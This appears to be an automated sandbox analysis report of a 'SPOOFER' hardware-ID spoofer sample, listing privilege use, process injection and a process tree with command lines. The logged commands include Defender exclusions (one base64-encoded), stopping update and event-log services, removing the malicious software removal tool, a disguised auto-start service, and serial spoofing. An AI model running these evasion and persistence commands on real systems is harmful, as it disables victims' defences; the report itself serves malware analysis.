Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\cmd.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\cmd.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\cmd.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wusa.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wusa.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wusa.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\wusa.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\cmd.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4368 wrote to memory of 720 N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 4368 wrote to memory of 720 N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 4368 wrote to memory of 2192 N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe C:\Windows\System32\cmd.exe
PID 4368 wrote to memory of 2192 N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe C:\Windows\System32\cmd.exe
PID 4368 wrote to memory of 2192 N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe C:\Windows\System32\cmd.exe
PID 2192 wrote to memory of 1948 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2192 wrote to memory of 1948 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2192 wrote to memory of 1948 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2192 wrote to memory of 3980 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
PID 2192 wrote to memory of 3980 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
PID 2192 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
PID 2192 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
PID 2192 wrote to memory of 2764 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\conhost_sft.exe
PID 2192 wrote to memory of 2764 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\conhost_sft.exe
PID 720 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 720 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 3980 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 3980 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 4536 wrote to memory of 3832 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 4536 wrote to memory of 3832 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 3980 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\Conhost.exe
PID 3980 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\Conhost.exe
PID 4388 wrote to memory of 3380 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 3380 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 3364 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 4388 wrote to memory of 3364 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 4388 wrote to memory of 636 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 636 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 2996 N/A C:\Windows\System32\Conhost.exe C:\Windows\System32\cmd.exe
PID 4388 wrote to memory of 2996 N/A C:\Windows\System32\Conhost.exe C:\Windows\System32\cmd.exe
PID 4388 wrote to memory of 1116 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 1116 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 380 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\cmd.exe
PID 4388 wrote to memory of 380 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\cmd.exe
PID 4388 wrote to memory of 996 N/A C:\Windows\System32\Conhost.exe C:\Windows\System32\Conhost.exe
PID 4388 wrote to memory of 996 N/A C:\Windows\System32\Conhost.exe C:\Windows\System32\Conhost.exe
PID 4388 wrote to memory of 2280 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\wusa.exe
PID 4388 wrote to memory of 2280 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\wusa.exe
PID 4388 wrote to memory of 1636 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 1636 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 1672 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 4388 wrote to memory of 1672 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 4388 wrote to memory of 3412 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe
PID 4388 wrote to memory of 3412 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe
PID 4388 wrote to memory of 4296 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 4388 wrote to memory of 4296 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 4388 wrote to memory of 4544 N/A C:\Windows\System32\Conhost.exe C:\Windows\System32\cmd.exe
PID 4388 wrote to memory of 4544 N/A C:\Windows\System32\Conhost.exe C:\Windows\System32\cmd.exe
PID 4388 wrote to memory of 1464 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\powercfg.exe
PID 4388 wrote to memory of 1464 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\powercfg.exe
PID 4388 wrote to memory of 5104 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 5104 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 3980 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 3980 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: ZFB2-0U5Z

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: ZFB2-0U5Z

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17975HP-TRGT32468AB

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317985HP-TRGT31945DQ

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717985HP-TRGT31945MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617985HP-TRGT31945FU

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417985HP-TRGT31945FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517985HP-TRGT31945SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817985HP-TRGT31945SG

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217985HP-TRGT31945RV

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 518001HP-TRGT20151SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 318005HP-TRGT30900DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 718005HP-TRGT30900MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 618005HP-TRGT30900FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 418001HP-TRGT20151FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 818001HP-TRGT20151SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 218001HP-TRGT20151RV

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 18001HP-TRGT20151AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 218021HP-TRGT19106RV

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 418021HP-TRGT19106FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 518021HP-TRGT19106SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 718021HP-TRGT19106MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 318021HP-TRGT19106DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 618021HP-TRGT19106FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 818021HP-TRGT19106SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 18021HP-TRGT19106AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: MZCZ-INRS

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: MZCZ-INRS

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: CTKV-Z543

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: CTKV-Z543

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 3ZBA-R7ET

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 3ZBA-R7ET

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 9208-Z9JG

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 9208-Z9JG

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "driverupdate"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "driverupdate"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"

C:\Windows\system32\powercfg.exe

